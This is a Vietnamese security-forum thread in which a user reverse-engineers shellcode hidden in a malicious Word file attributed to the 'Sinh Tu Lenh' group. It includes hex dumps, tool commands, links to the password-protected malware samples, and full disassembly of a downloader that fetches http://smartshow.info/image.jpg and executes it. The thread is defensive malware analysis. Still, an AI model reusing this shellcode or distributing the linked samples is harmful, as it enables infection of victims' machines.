<![CDATA[Latest posts for the topic "RCE đám virus của Sinh Tử Lệnh."]]> /hvaonline/posts/list/36.html JForum - http://www.jforum.net RCE đám virus của Sinh Tử Lệnh. Nói trước: Em vốn dốt văn, trình bày, viết văn rất dở, hay sai lỗi hỏi ngã. Nên đọc thấy sai, thấy dở thì thông cảm, bỏ qua, khỏi đọc tiếp. Giới thiệu: Chắc các bạn ở đây đều biết về đám Sinh Tử Lệnh, và chắc phải nhủ thầm: "Đám này ghê gớm thật", và tui cũng nghĩ vậy. Trong quá trình RE một số con malware của đám này, tui cũng phải thốt lên: Kinh thật, ghê ghớm thật. Trình độ code malware và hệ thống của tụi này rất khá, rất chuyên nghiệp. Chúng dùng nhiều kỹ thuật undocument, ít thấy trong giới viết malware thế giới và hầu như chưa thấy trong đám script kiddie viết virus của VN ta. Nhiều đoạn code tui thấy quen quen nhưng không thể nhớ và nói chính xác là đã gặp ở đâu. Chuyện bắt đầu từ cái topic năm ngoái về việc anh conmale, admin của diển đàn chúng ta bị đám STL cài keylog và ăn cắp password. Các bạn có thể search xem lại. Lúc ấy tui có pm anh conmale và được anh gởi cho 1 file MS Word, có name: "Danh sach IP.doc". Anh conmale compress lại và gởi cho tui. Mọi chuyện bắt đầu từ đây, tui cũng bị mất password HVA cũng vì file này. File này được tui upload lên mediafire tại: http://www.mediafire.com/?idgejaug9gnjoj2, password = malware. Quên nói là các bạn không nên mở file .doc này bằng MS Word. Dính malware của STL liền đấy. Havythoai cũng đã hỏi tui file này nhưng lúc đó lu bu và lười quá nên chưa gởi cho Havythoai. Sorry Thoại nhé. Lúc đó máy tui cài MS Security Essential (cờ rắc để pass WPA), tui đã quét thử file .doc này nhưng MSSE không phát hiện ra. Thậm chí tới bây giờ KAV 2011 (bản quyền đàng hoàng nha) vẫn không phát hiện ra:
Lúc đó thì cái VM trên Virtual PC của tui bị hư, lại vừa mới đi nhậu về, chủ quan sau khi quét xong thấy không có gì liền open ngay. Kết quả, Word đơ luôn. Kill nó, cúp đi ngủ. Sáng ra thấy máy là lạ, phát hiện ra một đống file lạ ngay. Tới tận bây giờ, VirusToal và ThreadExpert vẫn không phát hiện ra malware trong file .doc này. Dưới đây là kết quả của 2 trang Online Scan đó: 1. http://www.threatexpert.com/report.aspx?md5=386c739a66934bdc84dbd62f335a0f76 2. http://www.virustotal.com/file-scan/report.html?id=381a690f90ce769dd9f323709a54a0cfd62cf516f8dfe2a2c1996e419f591461-1305993552 Tất cả các AV đều không phát hiện ra exploit bug trong file .doc này. Điều này chứng tỏ exploit bug này là undocument, đã có từ năm ngoái và tới bây giờ vẫn không công bố. Và tui dám 90% chắc chắn là exploit này không thể do người VN trong nước phát hiện ra (vì tui nghĩ nếu người VN ta mà phát hiện ra thì đã um xùm lên rồi). Tui sẽ không phân tích kỹ thuật của exploit này, chỉ tập trung vào phân tích cách xác định shellcode trong file .doc và disassembly/debug xem nó làm gì. Còn exploit thì sẽ có ở topic khác. PS: Anh em STL vào đây thấy em nói gì sai thì ra mặt chỉ bảo cho newbie như em nhé. Em biết có mấy anh vẫn ở đây thôi.]]>
/hvaonline/posts/list/38818.html#237584 /hvaonline/posts/list/38818.html#237584 GMT
Tìm và phân tích shellcode của file .doc http://go.microsoft.com/fwlink/?LinkId=158791để mở file .doc này lên, xem nó có dùng những well-known exploit nào, hoàn toàn không có.
Chỉ là warning của OffVis do file .doc corrupt nên OffVis không xác định được CVE chính xác, chỉ đưa ra warning: CVE-2006-4534 Tiếp tục, dùng OfficeCat http://www.snort.org/vrt/vrt-resources/officecat để scan, cũng không thấy gì cả, chỉ báo file corrup. Đúng như kết quả của OffVis đưa ra.
Tiếp tục, như các bạn biết, có rất nhiều trình HexEditor, nhưng để analyzer file format thì theo tui tốt nhất và tui đang dùng là 101 Editor và FileInsight. Nhưng 101 Editor là trình "xe que", phải mua (nhưng em thì vẫn đang dùng bản cờ rắc tìm trên Internet ;)), nên em dùng FileInsight http://www.mcafee.com/us/downloads/free-tools/index.aspx để analyzer sơ bộ. Mở file .doc trong FileInsight, sờ cờ ron tới ron lui lòi ra điểm khả nghi:
Các bạn sẽ thấy ngay các string lộn xộn đó chính là các hàm API quen thuộc mà shellcode thường dùng: GetTempFileNameW, GetTempPathW, RtlZeroMemory, URLDownloadToFile, LoadLibaryA... Các string này không liền kề nhau, vì các bạn để ý đến left panel bên tay phải, của sổ Disassembly, sẽ thấy là code của STL move từng dword 1 chứa 4 ký tự của các hàm API vào các buffer liền kề nhau (mấy ông nội, sao không đảo thứ tự của các buffer này đi, nếu đảo thì tui tìm sao ra !?) Tui post chưa xong mà khách ở đâu vào topic này lắm thế: 6 khách rồi à ?]]>
/hvaonline/posts/list/38818.html#237587 /hvaonline/posts/list/38818.html#237587 GMT
RCE virus của đám Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237589 /hvaonline/posts/list/38818.html#237589 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237592 /hvaonline/posts/list/38818.html#237592 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237602 /hvaonline/posts/list/38818.html#237602 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237603 /hvaonline/posts/list/38818.html#237603 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Bà con khác xem có được hình không vậy ? Ngán nhất là cái capture, up hình ! 
Anh cứ việc upload lên site nào đó, em sẽ điều chỉnh bài viết của anh, upload hình bài viết lên thư mục hình ảnh trên server của HVA để khỏi bị ban, xoá hình cho anh em tiện việc tham khảo, trao đổi, thảo luận. Em và anh em khác đang mong đợi các bài viết phân tích của anh ;-) ]]>
/hvaonline/posts/list/38818.html#237604 /hvaonline/posts/list/38818.html#237604 GMT
RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
... Mọi chuyện bắt đầu từ đây, tui cũng bị mất password HVA cũng vì file này. File này được tui upload lên mediafire tại: http://www.mediafire.com/?idgejaug9gnjoj2, password = malware. Quên nói là các bạn không nên mở file .doc này bằng MS Word. Dính malware của STL liền đấy. 
Em thử tải về và extract ra thì được file .bin mà:
$ file virus.doc.bin virus.doc.bin: Composite Document File V2 Document, Little Endian, Os 0, Version: 3.10, Create Time/Date: Sun Feb 11 19:56:00 1996, Last Printed: Sat Feb 24 14:11:00 1996, Last Saved Time/Date: Sun Mar 3 18:23:00 1996, Number of Words: 5370, Number of Characters: 30612, Total Editing Time: 01:01:00, Number of Pages: 17, Security: 0  
Thử với `strings`: Code:
eeb53 GetT
  eeb5d empF
  eeb67 ileN
  eeb71 ameW
  eeb82 GetT
  eeb8c empP
  eeb96 athW
  eeba7 RtlZ
  eebb1 eroM
  eebbb emorf
  eebce Urlm
  eebd8 on.df
  eebf2 URLD
  eebfc ownl
  eec06 oadT
  eec10 oFilf
  eec2a Load
  eec34 Libr
  eec3e aryA
  eecd8 WVUR
  eecf4 8GetPu/
  eecfe rocAu&
  eed07 ddreu
  eed33 Z]^_3
  eee4f Crea
  eee59 tePr
  eee63 ocesf
  eeef7 Term
  eef01 inat
  eef0b ePro
  eef15 cess
  ef81b Normal
hay `bvi`: Code:
000EEB44  33 C0 66 89 85 4E FD FF FF C7 85 F4 FC FF FF 47 65 74 54 C7 85 F8 FC FF FF 65 6D 70 3.f..N.........GetT......emp
000EEB60  46 C7 85 FC FC FF FF 69 6C 65 4E C7 85 00 FD FF FF 61 6D 65 57 C6 85 04 FD FF FF 00 F......ileN......ameW.......
000EEB7C  C7 85 DC FC FF FF 47 65 74 54 C7 85 E0 FC FF FF 65 6D 70 50 C7 85 E4 FC FF FF 61 74 ......GetT......empP......at
000EEB98  68 57 C6 85 E8 FC FF FF 00 C7 85 C4 FC FF FF 52 74 6C 5A C7 85 C8 FC FF FF 65 72 6F hW.............RtlZ......ero
000EEBB4  4D C7 85 CC FC FF FF 65 6D 6F 72 66 C7 85 D0 FC FF FF 79 00 C7 85 B0 FC FF FF 55 72 M......emorf......y.......Ur
000EEBD0  6C 6D C7 85 B4 FC FF FF 6F 6E 2E 64 66 C7 85 B8 FC FF FF 6C 6C C6 85 BA FC FF FF 00 lm......on.df......ll.......
000EEBEC  C7 85 90 FC FF FF 55 52 4C 44 C7 85 94 FC FF FF 6F 77 6E 6C C7 85 98 FC FF FF 6F 61 ......URLD......ownl......oa
000EEC08  64 54 C7 85 9C FC FF FF 6F 46 69 6C 66 C7 85 A0 FC FF FF 65 57 C6 85 A2 FC FF FF 00 dT......oFilf......eW.......
000EEC24  C7 85 78 FC FF FF 4C 6F 61 64 C7 85 7C FC FF FF 4C 69 62 72 C7 85 80 FC FF FF 61 72 ..x...Load..|...Libr......ar
000EEC40  79 41 C6 85 84 FC FF FF 00 C7 85 3C FC FF FF 6B 00 65 00 C7 85 40 FC FF FF 72 00 6E yA.........<...k.e...@...r.n
000EEC5C  00 C7 85 44 FC FF FF 65 00 6C 00 66 C7 85 48 FC FF FF 33 00 66 C7 85 4A FC FF FF 32 ...D...e.l.f..H...3.f..J...2
000EEC78  00 C7 85 4C FC FF FF 2E 00 64 00 C7 85 50 FC FF FF 6C 00 6C 00 66 C7 85 54 FC FF FF ...L.....d...P...l.l.f..T...
000EEC94  00 00 33 C0 64 8B 15 30 00 00 00 8B 52 0C 8B 52 14 33 F6 33 FF 8B 12 83 FA 00 74 1C ..3.d..0....R..R.3.3......t.
000EECB0  8B 72 28 8D BD 3C FC FF FF B9 0D 00 00 00 56 57 E8 32 FC FF FF 83 F8 00 74 03 EB DD .r(..<........VW.2......t...
000EECCC  CC 8B 52 10 89 95 64 FD FF FF 8B DA 57 56 55 52 8B C3 8B E8 03 40 3C 8B 78 78 03 FD ..R...d.....WVUR.....@<.xx..
000EECE8  8B 77 20 03 F5 33 D2 8B 06 03 C5 81 38 47 65 74 50 75 2F 81 78 04 72 6F 63 41 75 26 .w ..3......8GetPu/.x.rocAu&
000EED04  81 78 08 64 64 72 65 75 1D 66 81 78 0C 73 73 75 15 8B 47 24 03 C5 0F B7 1C 50 8B 47 .x.ddreu.f.x.ssu
Em thì mù tịt khoản này vì thiếu kiến thức căn bản nhưng mà cũng thích ngồi mày mò, nghịch ngợm.

TQN wrote:
Vậy là ta chắc chắn file doc này có chứa shellcode, vấn đề của chúng ta tiếp tục làm là phải extract được shellcode này,  
Dùng cái MalHost-Setup trong OfficeMalScanner được không anh?

TQN wrote:
xác định được entry point của shellcode,  
Có gì nhờ anh giải thích kỹ chỗ này nhé.

TQN wrote:
disassembly và debug shellcode, xem thử shellcode này download cái gì về máy tui và máy anh conmale,  
Em thử với `objdump`, nhưng mà nhìn vào... hoa cả mắt.]]>
/hvaonline/posts/list/38818.html#237653 /hvaonline/posts/list/38818.html#237653 GMT
RCE đám virus của Sinh Tử Lệnh. Code:
push ebp
mov ebp,esp
sub esp, xxxx
........
Chuỗi hex opcode của 3 lệnh trên = 55 8B EC 81 EC. Hoặc shellcode có thể bắt đầu = code: pushad (0x60), pushfd (0x90). Ta dùng chính FileInsight, disassembly mode recursively, search 90 90 90 90, ta sẽ tìm được 2 buffer 0x90 lớn, bắt đầu tại offset: 0xEE870, size = 100d và 0xEEF40, size = 1256d bytes. Tại offset 0xEE8D4, ta thấy ngay mã 55 8B EC cần tìm. Đây chính là entry point của shellcode. Dùng Find của FileInsight, tìm chuỗi hex 55 8B EC, ta chỉ found duy nhất tại điểm đấy. Shellcode thường chỉ có 1, ít khi 2, nhưng để an toàn, ta tìm tiếp byte 60 90 và 90 60, không có. Vậy thì tạm kết luận entrypoint của shellcode ở 0xEE8D4:
Tiếp tục, chúng ta đã xác định được shellcode, giờ thì làm sao debug và disassembly nó. Có rất nhiều cách: 1. Cách đơn giản nhất, patch byte tại EP của shellcode thành Int 3 (0xCC) hay 0xEB 0xFE rồi run Word dưới trình debug. Cách này tui sẽ post ở topic khác để tìm hiểu lỗi parser của Word với OLEStream dị dạng này. 2. Copy đoạn hex code trên từ 0xEE8D4 tới 0xEEF39 rồi dùng các tool, các source shellcode2exe để tạo ra exe rồi analyze và debug. 3. Dùng tool có sẵn. Em chọn cách này, nhanh khoẻ cho rồi. Như quanta đã nói, Frank Boldewin (một trong những guru về RCE mà em ngưỡng mộ) có viết tool: OfficeMalScanner [ http://www.reconstructer.org/code/OfficeMalScanner.zip]. Ver hiện tại là 0.53, phát hiện được shellcode trong file .doc này. Hồi đó ver 0.3x thì khi em dùng scan thì không. Các bạn gõ dùng cmdline với options: scan brute debug thì sẽ thấy kết quả giống như kết quả ta đã phát hiện ra trong FileInsight:
Shellcode của tụi STL này có hai điểm dở (sorry mấy đại ca nhé): 1. Đã biết truy xuất PEB address để lấy kernel32.dll base mà không tự parse để address của các hàm API cần dùng mà phải dùng GetProcAddress để lấy. 2. Không dùng API hash để lấy API address Vì vậy mấy cái string API name mới hiện ra như vậy. Tiếp tục dùng ct MalHost-Setup.exe trong bộ OfficeMalScanner để tạo exe shellcode để debug:
MalHost-Setup.exe virus.doc virus.exe 0xEE8D4  
Vậy là ta có file virus.exe wrap shellcode. File .exe mà MalHost-Setup sinh ra wrap shellcode = Overlay. Khi run nó sẽ extract shellcode ra thư mục %Temp% với tên file là droppedmal, rồi lại load ngược lại file đó = Memory Mapping API, rồi jump ới EP của shellcode (Quái, sao không jump thẵng luôn cho rồi !?)
File virus.exe tui up tại: http://www.mediafire.com/?0zbhz8kahcefijb, password=malware. File này bị các AV detect nên các bạn phải tạm thời tắt AV, không được run, đặt breakpoint tại 0x00401485 để debug shellcode. Các bạn có thể dùng IDA hay OllyDbg hay bất cứ trình debug nào. Em dùng cả IDA và OllyDbg. ]]>
/hvaonline/posts/list/38818.html#237673 /hvaonline/posts/list/38818.html#237673 GMT
RCE đám virus của Sinh Tử Lệnh.

Kết quả Whois: Code:
Domain ID:D32531112-LRMS
Domain Name:SMARTSHOW.INFO
Created On:22-Apr-2010 11:06:53 UTC
Last Updated On:03-May-2011 03:00:45 UTC
Expiration Date:22-Apr-2012 11:06:53 UTC
Sponsoring Registrar:OnlineNIC, Inc. (R170-LRMS)
Status:CLIENT HOLD
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:OLNI_196680_0_0
Registrant Name:Domain ID Shield Service
Registrant Organization:Domain ID Shield Service CO., Limited
Registrant Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Registrant Street2:
Registrant Street3:
Registrant City:Hong Kong
Registrant State/Province:Hong Kong
Registrant Postal Code:999077
Registrant Country:CN
Registrant Phone:+852.22060092
Registrant Phone Ext.:
Registrant FAX:+852.30030133
Registrant FAX Ext.:
Registrant Email:sm324544432187684@domainidshield.com
Admin ID:OLNI_196680_1_0
Admin Name:Domain ID Shield Service
Admin Organization:Domain ID Shield Service CO., Limited
Admin Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Admin Street2:
Admin Street3:
Admin City:Hong Kong
Admin State/Province:Hong Kong
Admin Postal Code:999077
Admin Country:CN
Admin Phone:+852.22060092
Admin Phone Ext.:
Admin FAX:+852.30030133
Admin FAX Ext.:
Admin Email:sm324544418797681@domainidshield.com
Billing ID:OLNI_196680_3_0
Billing Name:Domain ID Shield Service
Billing Organization:Domain ID Shield Service CO., Limited
Billing Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Billing Street2:
Billing Street3:
Billing City:Hong Kong
Billing State/Province:Hong Kong
Billing Postal Code:999077
Billing Country:CN
Billing Phone:+852.22060092
Billing Phone Ext.:
Billing FAX:+852.30030133
Billing FAX Ext.:
Billing Email:sm324544489757683@domainidshield.com
Tech ID:OLNI_196680_2_0
Tech Name:Domain ID Shield Service
Tech Organization:Domain ID Shield Service CO., Limited
Tech Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Tech Street2:
Tech Street3:
Tech City:Hong Kong
Tech State/Province:Hong Kong
Tech Postal Code:999077
Tech Country:CN
Tech Phone:+852.22060092
Tech Phone Ext.:
Tech FAX:+852.30030133
Tech FAX Ext.:
Tech Email:sm324544451417682@domainidshield.com
Name Server:NS1.BYETHOST42.ORG
Name Server:NS2.BYETHOST42.ORG
Lại là HongKong, CN nữa. Host này không còn hoạt động nữa nên file image.jpg em không lấy về được, còn file mà hồi đó nó drop vào máy em thì em xoá 3 đời 8 hoánh rồi. Bây giờ em cũng mệt rồi, nên em chỉ nói ngắn gọn các công đoạn của shellcode: 1. Tạo URL string. 2. Tạo API name bằng cách mov từng DWORD API name vào buffer. 3. Lấy PEB address, duyệt module link list để lấy kernel32.dll base address 4. Scan export table của kernel32.dll để lấy address của GetProcAddress 5. Download file image.jpg về %Temp%\randomname 6. Nếu download thành công, call CreateProcess với param là file jpg đó. File đó thực chất là file exe, mở đường cho download một loạt malware khác của mấy "ông nội" STL về máy victim (lại victim nữa, nhắc lại niềm đau của em). 7. Nếu download không thành công, TerminateProcess luôn (WinWord đi luôn). Code ASM của ShellcodeProc: Code:
debug008:00148C72      @@BuildURL:                             ; CODE XREF: ShellcodeProc+1Ej
debug008:00148C72  548 sub     esp, 100h
debug008:00148C78  648 mov     eax, 'h'
debug008:00148C7D  648 mov     [ebp+szURL], ax
debug008:00148C84  648 mov     eax, 't'
debug008:00148C89  648 mov     [ebp-2EEh], ax
debug008:00148C90  648 mov     eax, 't'
debug008:00148C95  648 mov     [ebp+var_2EC], ax
debug008:00148C9C  648 mov     eax, 'p'
debug008:00148CA1  648 mov     [ebp+var_2EA], ax
debug008:00148CA8  648 mov     eax, ':'
debug008:00148CAD  648 mov     [ebp+var_2E8], ax
debug008:00148CB4  648 mov     eax, '/'
debug008:00148CB9  648 mov     [ebp+var_2E6], ax
debug008:00148CC0  648 mov     eax, '/'
debug008:00148CC5  648 mov     [ebp+var_2E4], ax
debug008:00148CCC  648 mov     eax, 's'
debug008:00148CD1  648 mov     [ebp+var_2E2], ax
debug008:00148CD8  648 mov     eax, 'm'
debug008:00148CDD  648 mov     [ebp+var_2E0], ax
debug008:00148CE4  648 mov     eax, 'a'
debug008:00148CE9  648 mov     [ebp+var_2DE], ax
debug008:00148CF0  648 mov     eax, 'r'
debug008:00148CF5  648 mov     [ebp+var_2DC], ax
debug008:00148CFC  648 mov     eax, 't'
debug008:00148D01  648 mov     [ebp+var_2DA], ax
debug008:00148D08  648 mov     eax, 's'
debug008:00148D0D  648 mov     [ebp+var_2D8], ax
debug008:00148D14  648 mov     eax, 'h'
debug008:00148D19  648 mov     [ebp+var_2D6], ax
debug008:00148D20  648 mov     eax, 'o'
debug008:00148D25  648 mov     [ebp+var_2D4], ax
debug008:00148D2C  648 mov     eax, 'w'
debug008:00148D31  648 mov     [ebp+var_2D2], ax
debug008:00148D38  648 mov     eax, '.'
debug008:00148D3D  648 mov     [ebp+var_2D0], ax
debug008:00148D44  648 mov     eax, 'i'
debug008:00148D49  648 mov     [ebp+var_2CE], ax
debug008:00148D50  648 mov     eax, 'n'
debug008:00148D55  648 mov     [ebp+var_2CC], ax
debug008:00148D5C  648 mov     eax, 'f'
debug008:00148D61  648 mov     [ebp+var_2CA], ax
debug008:00148D68  648 mov     eax, 'o'
debug008:00148D6D  648 mov     [ebp+var_2C8], ax
debug008:00148D74  648 mov     eax, '/'
debug008:00148D79  648 mov     [ebp+var_2C6], ax
debug008:00148D80  648 mov     eax, 'i'
debug008:00148D85  648 mov     [ebp+var_2C4], ax
debug008:00148D8C  648 mov     eax, 'm'
debug008:00148D91  648 mov     [ebp+var_2C2], ax
debug008:00148D98  648 mov     eax, 'a'
debug008:00148D9D  648 mov     [ebp+var_2C0], ax
debug008:00148DA4  648 mov     eax, 'g'
debug008:00148DA9  648 mov     [ebp+var_2BE], ax
debug008:00148DB0  648 mov     eax, 'e'
debug008:00148DB5  648 mov     [ebp+var_2BC], ax
debug008:00148DBC  648 mov     eax, '.'
debug008:00148DC1  648 mov     [ebp+var_2BA], ax
debug008:00148DC8  648 mov     eax, 'j'
debug008:00148DCD  648 mov     [ebp+var_2B8], ax
debug008:00148DD4  648 mov     eax, 'p'
debug008:00148DD9  648 mov     [ebp+var_2B6], ax
debug008:00148DE0  648 mov     eax, 'g'
debug008:00148DE5  648 mov     [ebp+var_2B4], ax
debug008:00148DEC
debug008:00148DEC      @@BuildAPINames:
debug008:00148DEC  648 xor     eax, eax
debug008:00148DEE  648 mov     [ebp+var_2B2], ax
debug008:00148DF5  648 mov     [ebp+szGetTempFileNameW], 'TteG'
debug008:00148DFF  648 mov     [ebp+var_308], 'Fpme'
debug008:00148E09  648 mov     [ebp+var_304], 'Neli'
debug008:00148E13  648 mov     [ebp+var_300], 'Wema'
debug008:00148E1D  648 mov     [ebp+var_2FC], 0
debug008:00148E24  648 mov     [ebp+szGetTempPathW], 'TteG'
debug008:00148E2E  648 mov     [ebp+var_320], 'Ppme'
debug008:00148E38  648 mov     [ebp+var_31C], 'Whta'
debug008:00148E42  648 mov     [ebp+var_318], 0
debug008:00148E49  648 mov     [ebp+szRtlZeroMemory], 'ZltR'
debug008:00148E53  648 mov     [ebp+var_338], 'More'
debug008:00148E5D  648 mov     [ebp+var_334], 'rome'
debug008:00148E67  648 mov     [ebp+var_330], 79h
debug008:00148E70  648 mov     [ebp+szUrlmon.dll], 'mlrU'
debug008:00148E7A  648 mov     [ebp+var_34C], 'd.no'
debug008:00148E84  648 mov     [ebp+var_348], 'll'
debug008:00148E8D  648 mov     [ebp+var_346], 0
debug008:00148E94  648 mov     [ebp+szURLDownloadToFile], 'DLRU'
debug008:00148E9E  648 mov     [ebp+var_36C], 'lnwo'
debug008:00148EA8  648 mov     [ebp+var_368], 'Tdao'
debug008:00148EB2  648 mov     [ebp+var_364], 'liFo'
debug008:00148EBC  648 mov     [ebp+var_360], 'We'
debug008:00148EC5  648 mov     [ebp+var_35E], 0
debug008:00148ECC  648 mov     [ebp+szLoadLibraryA], 'daoL'
debug008:00148ED6  648 mov     [ebp+var_384], 'rbiL'
debug008:00148EE0  648 mov     [ebp+var_380], 'Ayra'
debug008:00148EEA  648 mov     [ebp+var_37C], 0
debug008:00148EF1  648 mov     [ebp+var_3C4], 65006Bh ; <suspicious> ; kernel32.dll string in Unicode
debug008:00148EFB  648 mov     [ebp+var_3C0], 6E0072h ; <suspicious>
debug008:00148F05  648 mov     [ebp+var_3BC], 6C0065h ; <suspicious>
debug008:00148F0F  648 mov     [ebp+var_3B8], '3'
debug008:00148F18  648 mov     [ebp+var_3B6], '2'
debug008:00148F21  648 mov     [ebp+var_3B4], 64002Eh
debug008:00148F2B  648 mov     [ebp+var_3B0], 6C006Ch ; <suspicious>
debug008:00148F35  648 mov     [ebp+var_3AC], 0
debug008:00148F3E  648 xor     eax, eax
debug008:00148F40  648 mov     edx, large fs:30h
debug008:00148F47  648 mov     edx, [edx+0Ch]
debug008:00148F4A  648 mov     edx, [edx+14h]
debug008:00148F4D  648 xor     esi, esi
debug008:00148F4F  648 xor     edi, edi
debug008:00148F4F
debug008:00148F51
debug008:00148F51      loc_148F51:                             ; CODE XREF: ShellcodeProc+3F6j
debug008:00148F51  648 mov     edx, [edx]
debug008:00148F53  648 cmp     edx, 0
debug008:00148F56  648 jz      short loc_148F74
debug008:00148F56
debug008:00148F58  648 mov     esi, [edx+28h]
debug008:00148F5B  648 lea     edi, [ebp+var_3C4]
debug008:00148F61  648 mov     ecx, 0Dh
debug008:00148F66  648 push    esi
debug008:00148F67  64C push    edi
debug008:00148F68  650 call    @@FindKernel32Base
debug008:00148F68
debug008:00148F6D  650 cmp     eax, 0
debug008:00148F70  650 jz      short @@FindGetProcAddress
debug008:00148F70
debug008:00148F72  650 jmp     short loc_148F51
debug008:00148F72
debug008:00148F74      ; ---------------------------------------------------------------------------
debug008:00148F74
debug008:00148F74      loc_148F74:                             ; CODE XREF: ShellcodeProc+3DAj
debug008:00148F74  648 int     3                               ; Trap to Debugger
debug008:00148F74
debug008:00148F75
debug008:00148F75      @@FindGetProcAddress:                   ; CODE XREF: ShellcodeProc+3F4j
debug008:00148F75  648 mov     edx, [edx+10h]
debug008:00148F78  648 mov     [ebp+hKernel32], edx
debug008:00148F7E  648 mov     ebx, edx
debug008:00148F80  648 push    edi
debug008:00148F81  64C push    esi
debug008:00148F82  650 push    ebp
debug008:00148F83  654 push    edx
debug008:00148F84  658 mov     eax, ebx
debug008:00148F86  658 mov     ebp, eax
debug008:00148F88  658 add     eax, [eax+3Ch]
debug008:00148F8B  658 mov     edi, [eax+78h]
debug008:00148F8E  658 add     edi, ebp
debug008:00148F90  658 mov     esi, [edi+20h]
debug008:00148F93  658 add     esi, ebp
debug008:00148F95  658 xor     edx, edx
debug008:00148F95
debug008:00148F97
debug008:00148F97      @@IsGetProcAddress:                     ; CODE XREF: ShellcodeProc+45Dj
debug008:00148F97  658 mov     eax, [esi]
debug008:00148F99  658 add     eax, ebp
debug008:00148F9B  658 cmp     dword ptr [eax], 'PteG'
debug008:00148FA1  658 jnz     short @@NextName
debug008:00148FA1
debug008:00148FA3  658 cmp     dword ptr [eax+4], 'Acor'
debug008:00148FAA  658 jnz     short @@NextName
debug008:00148FAA
debug008:00148FAC  658 cmp     dword ptr [eax+8], 'erdd'
debug008:00148FB3  658 jnz     short @@NextName
debug008:00148FB3
debug008:00148FB5  658 cmp     word ptr [eax+0Ch], 'ss'
debug008:00148FBB  658 jnz     short @@NextName
debug008:00148FBB
debug008:00148FBD  658 mov     eax, [edi+24h]
debug008:00148FC0  658 add     eax, ebp
debug008:00148FC2  658 movzx   ebx, word ptr [eax+edx*2]
debug008:00148FC6  658 mov     eax, [edi+1Ch]
debug008:00148FC9  658 add     eax, ebp
debug008:00148FCB  658 mov     ebx, [eax+ebx*4]
debug008:00148FCE  658 add     ebx, ebp
debug008:00148FD0  658 jmp     short @@BuildAPIAddress
debug008:00148FD0
debug008:00148FD2      ; ---------------------------------------------------------------------------
debug008:00148FD2
debug008:00148FD2      @@NextName:                             ; CODE XREF: ShellcodeProc+425j
debug008:00148FD2                                              ; ShellcodeProc+42Ej
debug008:00148FD2                                              ; ShellcodeProc+437j
debug008:00148FD2                                              ; ShellcodeProc+43Fj
debug008:00148FD2  658 add     esi, 4
debug008:00148FD5  658 inc     edx
debug008:00148FD6  658 cmp     edx, [edi+14h]
debug008:00148FD9  658 jnz     short @@IsGetProcAddress
debug008:00148FD9
debug008:00148FDB
debug008:00148FDB      @@BuildAPIAddress:                      ; CODE XREF: ShellcodeProc+454j
debug008:00148FDB  658 pop     edx
debug008:00148FDC  654 pop     ebp
debug008:00148FDD  650 pop     esi
debug008:00148FDE  64C pop     edi
debug008:00148FDF  648 xor     eax, eax
debug008:00148FE1  648 mov     [ebp+GetProcAddress], ebx
debug008:00148FE7  648 lea     eax, [ebp+szRtlZeroMemory]
debug008:00148FED  648 push    eax
debug008:00148FEE  64C push    [ebp+hKernel32]
debug008:00148FF4  650 call    [ebp+GetProcAddress]
debug008:00148FF4
debug008:00148FFA  650 cmp     eax, 0
debug008:00148FFD  650 jz      @@Terminate
debug008:00148FFD
debug008:00149003  650 mov     [ebp+RtlZeroMemory], eax
debug008:00149009  650 lea     eax, [ebp+szLoadLibraryA]
debug008:0014900F  650 push    eax
debug008:00149010  654 push    [ebp+hKernel32]
debug008:00149016  658 call    [ebp+GetProcAddress]
debug008:00149016
debug008:0014901C  658 mov     [ebp+LoadLibraryA], eax
debug008:00149022  658 lea     eax, [ebp+szUrlmon.dll]
debug008:00149028  658 push    eax
debug008:00149029  65C call    [ebp+LoadLibraryA]
debug008:00149029
debug008:0014902F  65C cmp     eax, 0
debug008:00149032  65C jz      @@Terminate
debug008:00149032
debug008:00149038  65C mov     [ebp+hUrlmon.dll], eax
debug008:0014903E  65C lea     eax, [ebp+szURLDownloadToFile]
debug008:00149044  65C push    eax
debug008:00149045  660 push    [ebp+hUrlmon.dll]
debug008:0014904B  664 call    [ebp+GetProcAddress]
debug008:0014904B
debug008:00149051  664 cmp     eax, 0
debug008:00149054  664 jz      @@Terminate
debug008:00149054
debug008:0014905A  664 mov     [ebp+URLDownloadToFile], eax
debug008:00149060  664 lea     eax, [ebp+szGetTempPathW]
debug008:00149066  664 push    eax
debug008:00149067  668 push    [ebp+hKernel32]
debug008:0014906D  66C call    [ebp+GetProcAddress]
debug008:0014906D
debug008:00149073  66C cmp     eax, 0
debug008:00149076  66C jz      @@Terminate
debug008:00149076
debug008:0014907C  66C mov     [ebp+GetTempPathW], eax
debug008:00149082  66C lea     eax, [ebp+szGetTempFileNameW]
debug008:00149088  66C push    eax
debug008:00149089  670 push    [ebp+hKernel32]
debug008:0014908F  674 call    [ebp+GetProcAddress]
debug008:0014908F
debug008:00149095  674 cmp     eax, 0
debug008:00149098  674 jz      @@Terminate
debug008:00149098
debug008:0014909E  674 mov     [ebp+GetTempFileNameW], eax
debug008:001490A4  674 lea     ebx, [ebp+szTempDir]
debug008:001490AA  674 push    ebx
debug008:001490AB  678 push    104h
debug008:001490B0  67C call    [ebp+GetTempPathW]
debug008:001490B0
debug008:001490B6  67C push    ebx
debug008:001490B7  680 push    0
debug008:001490B9  684 push    0
debug008:001490BB  688 push    ebx
debug008:001490BC  68C call    [ebp+GetTempFileNameW]
debug008:001490BC
debug008:001490C2  68C sub     esp, 1000h
debug008:001490C8  168C push    0
debug008:001490CA  1690 push    0
debug008:001490CC  1694 lea     ebx, [ebp+szTempDir]
debug008:001490D2  1694 push    ebx
debug008:001490D3  1698 lea     ebx, [ebp+szURL]
debug008:001490D9  1698 push    ebx
debug008:001490DA  169C push    0
debug008:001490DC  16A0 call    [ebp+URLDownloadToFile]
debug008:001490DC
debug008:001490E2  16A0 add     esp, 1000h
debug008:001490E8  6A0 cmp     eax, 0
